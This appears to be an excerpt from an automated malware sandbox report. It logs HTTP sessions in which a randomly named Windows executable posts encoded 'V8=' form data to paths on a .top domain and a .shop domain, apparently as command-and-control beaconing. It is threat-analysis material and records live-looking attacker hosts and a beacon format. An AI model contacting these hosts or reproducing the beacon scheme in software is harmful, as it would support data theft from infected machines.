                                                                                                                          Jan 10, 2025 16:44:38.625178099 CET851OUTPOST /iuei/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.x3kwqc5tye4vl90y.top
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.x3kwqc5tye4vl90y.top
                                                                                                                          Referer: http://www.x3kwqc5tye4vl90y.top/iuei/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6a 63 72 36 68 65 79 44 49 75 57 57 79 57 45 50 6f 6a 67 42 6c 66 48 73 72 6a 36 78 43 62 7a 48 44 68 36 74 6c 72 37 62 2b 69 32 73 49 79 6b 65 44 48 71 41 4c 61 44 6a 4d 72 46 49 42 62 5a 46 45 46 65 77 4b 32 52 54 48 6f 34 6a 4c 48 38 65 58 6d 76 31 36 73 4e 44 30 66 52 53 62 5a 67 4b 35 76 6f 64 6a 67 61 35 4b 6b 43 6f 75 38 77 39 41 30 36 76 71 4a 6b 41 4c 45 2f 42 78 42 6a 66 59 49 72 57 2b 72 71 62 58 7a 47 39 6b 31 68 4a 65 57 78 68 72 59 44 35 79 46 74 34 74 6b 32 56 41 32 65 5a 31 6b 33 31 37 43 71 4b 2f 49 45 2f 33 50 71 53 74 48 72 4f 34 54 73 75 55 6e 41 73 6c 55 75 6f 41 72 6f 3d
                                                                                                                          Data Ascii: V8=jcr6heyDIuWWyWEPojgBlfHsrj6xCbzHDh6tlr7b+i2sIykeDHqALaDjMrFIBbZFEFewK2RTHo4jLH8eXmv16sND0fRSbZgK5vodjga5KkCou8w9A06vqJkALE/BxBjfYIrW+rqbXzG9k1hJeWxhrYD5yFt4tk2VA2eZ1k317CqK/IE/3PqStHrO4TsuUnAslUuoAro=
                                                                                                                          Jan 10, 2025 16:44:39.498950005 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Content-Length: 548
                                                                                                                          Content-Type: text/html
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:39 GMT
                                                                                                                          Server: nginx
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.550014134.122.133.80802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:41.171515942 CET871OUTPOST /iuei/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.x3kwqc5tye4vl90y.top
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.x3kwqc5tye4vl90y.top
                                                                                                                          Referer: http://www.x3kwqc5tye4vl90y.top/iuei/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6a 63 72 36 68 65 79 44 49 75 57 57 30 33 30 50 74 45 55 42 69 2f 48 74 6b 44 36 78 4c 37 7a 44 44 6d 79 74 6c 76 4b 47 2b 52 65 73 49 57 6f 65 43 47 71 41 47 36 44 6a 56 62 45 6a 4d 37 5a 65 45 46 53 4f 4b 33 74 54 48 6f 73 6a 4c 47 4d 65 58 52 7a 30 6f 4d 4e 42 74 50 52 55 56 35 67 4b 35 76 6f 64 6a 67 50 69 4b 6e 79 6f 76 4d 41 39 42 52 4f 6f 72 4a 6b 66 43 6b 2f 42 31 42 6a 54 59 49 72 6b 2b 71 32 68 58 78 2b 39 6b 78 74 4a 51 6e 78 69 6c 6f 44 2f 38 6c 73 4f 75 6d 6a 34 4b 41 71 46 77 45 44 32 39 41 32 73 2b 2b 31 56 74 74 69 36 2b 6e 48 32 6f 41 6b 5a 46 58 68 46 2f 33 2b 59 65 38 2f 49 68 45 34 2b 41 4f 71 53 52 41 39 6b 38 59 67 74 56 6a 34 6d
                                                                                                                          Data Ascii: V8=jcr6heyDIuWW030PtEUBi/HtkD6xL7zDDmytlvKG+ResIWoeCGqAG6DjVbEjM7ZeEFSOK3tTHosjLGMeXRz0oMNBtPRUV5gK5vodjgPiKnyovMA9BROorJkfCk/B1BjTYIrk+q2hXx+9kxtJQnxiloD/8lsOumj4KAqFwED29A2s++1Vtti6+nH2oAkZFXhF/3+Ye8/IhE4+AOqSRA9k8YgtVj4m
                                                                                                                          Jan 10, 2025 16:44:42.068195105 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Content-Length: 548
                                                                                                                          Content-Type: text/html
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:41 GMT
                                                                                                                          Server: nginx
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.550015134.122.133.80802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:43.720895052 CET1888OUTPOST /iuei/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.x3kwqc5tye4vl90y.top
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.x3kwqc5tye4vl90y.top
                                                                                                                          Referer: http://www.x3kwqc5tye4vl90y.top/iuei/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 6a 63 72 36 68 65 79 44 49 75 57 57 30 33 30 50 74 45 55 42 69 2f 48 74 6b 44 36 78 4c 37 7a 44 44 6d 79 74 6c 76 4b 47 2b 52 47 73 49 6a 30 65 44 6c 53 41 48 36 44 6a 4b 72 46 45 4d 37 59 47 45 42 2b 4b 4b 33 68 6c 48 71 55 6a 4e 68 6b 65 66 44 62 30 6a 4d 4e 42 69 76 52 56 62 5a 68 49 35 76 34 6e 6a 67 66 69 4b 6e 79 6f 76 4f 59 39 47 45 36 6f 6d 70 6b 41 4c 45 2f 56 78 42 69 45 59 49 7a 30 2b 71 69 78 58 68 65 39 6c 56 42 4a 63 31 5a 69 6e 49 44 39 73 31 73 47 75 6d 2f 37 4b 41 65 4a 77 45 47 64 39 43 32 73 2b 50 51 57 31 74 36 78 74 78 48 38 6b 42 38 59 46 43 42 4f 79 31 47 74 63 38 58 6e 6b 31 46 63 41 70 43 51 55 54 70 6f 6f 39 6b 33 5a 32 78 49 44 46 59 4a 54 39 39 6d 6c 2f 5a 58 73 6d 59 78 2f 33 68 50 53 61 4a 46 48 4d 79 43 48 59 56 35 73 43 59 66 48 48 45 70 37 74 58 72 47 75 4d 2f 64 5a 6c 49 58 4b 67 41 34 4b 61 68 65 42 65 6b 72 77 2f 65 64 6b 31 62 63 45 6a 30 75 64 43 31 6d 53 75 52 6a 4d 57 65 41 64 53 6f 73 54 75 37 47 61 68 50 76 51 42 43 45 2f 31 71 55 62 45 70 2b 50 6e [TRUNCATED]
                                                                                                                          Data Ascii: V8=jcr6heyDIuWW030PtEUBi/HtkD6xL7zDDmytlvKG+RGsIj0eDlSAH6DjKrFEM7YGEB+KK3hlHqUjNhkefDb0jMNBivRVbZhI5v4njgfiKnyovOY9GE6ompkALE/VxBiEYIz0+qixXhe9lVBJc1ZinID9s1sGum/7KAeJwEGd9C2s+PQW1t6xtxH8kB8YFCBOy1Gtc8Xnk1FcApCQUTpoo9k3Z2xIDFYJT99ml/ZXsmYx/3hPSaJFHMyCHYV5sCYfHHEp7tXrGuM/dZlIXKgA4KaheBekrw/edk1bcEj0udC1mSuRjMWeAdSosTu7GahPvQBCE/1qUbEp+PnhQEK9TaBXGjFXodJSfa/SvoQ1boMqrh+Eb12nBPPXa5sl1f8FMzQNzi68eKmxZW0NXaUOw5pQ2nCNgC56SKGpXKGz6i/ID16sAoR6AO0idklLg7e+ZsITHlUIre6H9fPFOWOURE+cYtlnGMvzQLLWQK16X/g+4KSEzO7U0POHGzApQLgdNMjpUOtBXAJPxDlrjIK/NrKt1Zxdj+W8Cilf6HrDA6yvP6YtQxodh+TCoQ2qF9vR/yD6j+0jzNbSrmeXGNFhhcr7ooECVUMYWILyCAEQKeqzD4Y1IDGZp/C65WwbOhgE/lAxh+AsHhVOPm++IDjLFC9ARs9WFBJN8KY425GknwsOg5IctsDS7lSOqPVkiRycFBiNRx6wveWoFG++0fR6MXDmcUDZkPXoi0mtA741Kdl2ENvP3vV7jsLnQ7I6/5Sp765aMOC5dxy4ZbrWp4m5gZ5ZEL/JGUj0VZZu2Ra9OUeVaptTUcP2wwWhQ8VRptsW8UbIcCq+ufADaPX/W8UHGsul/unUfNadhGMGGjvbUZQ9Pig6EO5mgmNzd4zuhd0WQenbAWi5lEsXQ0fm2ru4kQiLkQoLkRbRggCXUI9wkpBvitBKDWo5ZCD3FGBoY9Tcnc4EqCRgtXAvC2OqPVjRW+PSrVfDim3gRpZ+u3QbRcXsMtYac [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:44:44.612195969 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Content-Length: 548
                                                                                                                          Content-Type: text/html
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:44 GMT
                                                                                                                          Server: nginx
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.550016134.122.133.80802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:46.257652044 CET583OUTGET /iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw== HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.x3kwqc5tye4vl90y.top
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:44:47.149096012 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Content-Length: 548
                                                                                                                          Content-Type: text/html
                                                                                                                          Date: Fri, 10 Jan 2025 15:44:46 GMT
                                                                                                                          Server: nginx
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.55001793.127.192.201802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:52.243621111 CET854OUTPOST /qfbg/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.al-madinatraders.shop
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.al-madinatraders.shop
                                                                                                                          Referer: http://www.al-madinatraders.shop/qfbg/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 49 71 62 36 74 69 53 6b 71 4a 4c 63 2b 4f 48 46 6c 6f 62 66 44 39 63 31 57 73 73 68 58 63 4e 53 33 54 49 63 46 36 4b 42 77 56 53 71 54 6d 67 7a 65 39 4b 58 52 70 2b 6d 46 4c 5a 68 54 54 37 52 35 79 65 5a 41 55 4a 66 35 50 42 74 7a 6c 6d 41 34 6b 76 53 6c 70 49 62 52 59 52 56 73 2f 51 65 66 44 6b 44 43 6f 2f 4e 58 37 7a 6a 59 42 6b 41 48 76 4f 42 4e 4d 33 31 79 5a 6b 39 34 44 36 59 73 57 42 51 78 35 78 43 65 42 33 43 51 58 6d 6d 71 36 77 49 71 42 53 4c 4d 76 4d 70 4d 63 6c 31 30 69 66 4f 4e 76 4e 7a 75 6c 63 35 6e 79 32 57 47 64 6c 37 4d 64 39 73 65 47 58 62 58 6e 4d 57 67 48 4a 4e 41 71 63 3d
                                                                                                                          Data Ascii: V8=Iqb6tiSkqJLc+OHFlobfD9c1WsshXcNS3TIcF6KBwVSqTmgze9KXRp+mFLZhTT7R5yeZAUJf5PBtzlmA4kvSlpIbRYRVs/QefDkDCo/NX7zjYBkAHvOBNM31yZk94D6YsWBQx5xCeB3CQXmmq6wIqBSLMvMpMcl10ifONvNzulc5ny2WGdl7Md9seGXbXnMWgHJNAqc=
                                                                                                                          Jan 10, 2025 16:44:52.907298088 CET715INHTTP/1.1 403 Forbidden
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/5.6.40
                                                                                                                          set-cookie: csrf_cookie_name=1dd8f356cad07854855386b19d5fe9ef; expires=Fri, 10-Jan-2025 17:44:52 GMT; Max-Age=7200; path=/
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          content-length: 196
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          date: Fri, 10 Jan 2025 15:44:52 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00
                                                                                                                          Data Ascii: -On0`B4V*iNp8|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K|pC9};bV


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.55001893.127.192.201802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:54.800040007 CET874OUTPOST /qfbg/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.al-madinatraders.shop
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.al-madinatraders.shop
                                                                                                                          Referer: http://www.al-madinatraders.shop/qfbg/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 49 71 62 36 74 69 53 6b 71 4a 4c 63 73 39 66 46 6a 4a 62 66 49 39 63 79 4b 38 73 68 46 63 4e 57 33 54 4d 63 46 37 4f 72 77 6e 47 71 55 44 63 7a 59 4d 4b 58 57 70 2b 6d 4b 62 5a 75 63 7a 37 4f 35 79 43 37 41 56 31 66 35 4c 68 74 7a 6c 32 41 34 56 76 52 6c 35 49 5a 5a 34 52 58 69 66 51 65 66 44 6b 44 43 73 57 57 58 37 72 6a 62 7a 77 41 56 65 50 7a 54 63 33 32 37 35 6b 39 79 6a 36 63 73 57 42 79 78 34 73 6c 65 44 2f 43 51 54 71 6d 6b 4a 6f 4c 78 78 53 4e 43 50 4e 64 44 38 45 4a 77 54 6a 66 41 73 67 4e 78 57 67 64 6d 45 48 38 63 2f 74 54 66 39 52 55 4f 56 66 73 47 58 74 2f 36 6b 5a 39 65 39 4a 49 69 37 58 42 62 62 49 58 43 66 45 72 5a 2b 33 74 37 49 67 66
                                                                                                                          Data Ascii: V8=Iqb6tiSkqJLcs9fFjJbfI9cyK8shFcNW3TMcF7OrwnGqUDczYMKXWp+mKbZucz7O5yC7AV1f5Lhtzl2A4VvRl5IZZ4RXifQefDkDCsWWX7rjbzwAVePzTc3275k9yj6csWByx4sleD/CQTqmkJoLxxSNCPNdD8EJwTjfAsgNxWgdmEH8c/tTf9RUOVfsGXt/6kZ9e9JIi7XBbbIXCfErZ+3t7Igf
                                                                                                                          Jan 10, 2025 16:44:55.404256105 CET715INHTTP/1.1 403 Forbidden
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/5.6.40
                                                                                                                          set-cookie: csrf_cookie_name=72c6b904c39735c8958616180baef3de; expires=Fri, 10-Jan-2025 17:44:55 GMT; Max-Age=7200; path=/
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          content-length: 196
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          date: Fri, 10 Jan 2025 15:44:55 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00
                                                                                                                          Data Ascii: -On0`B4V*iNp8|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K|pC9};bV


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
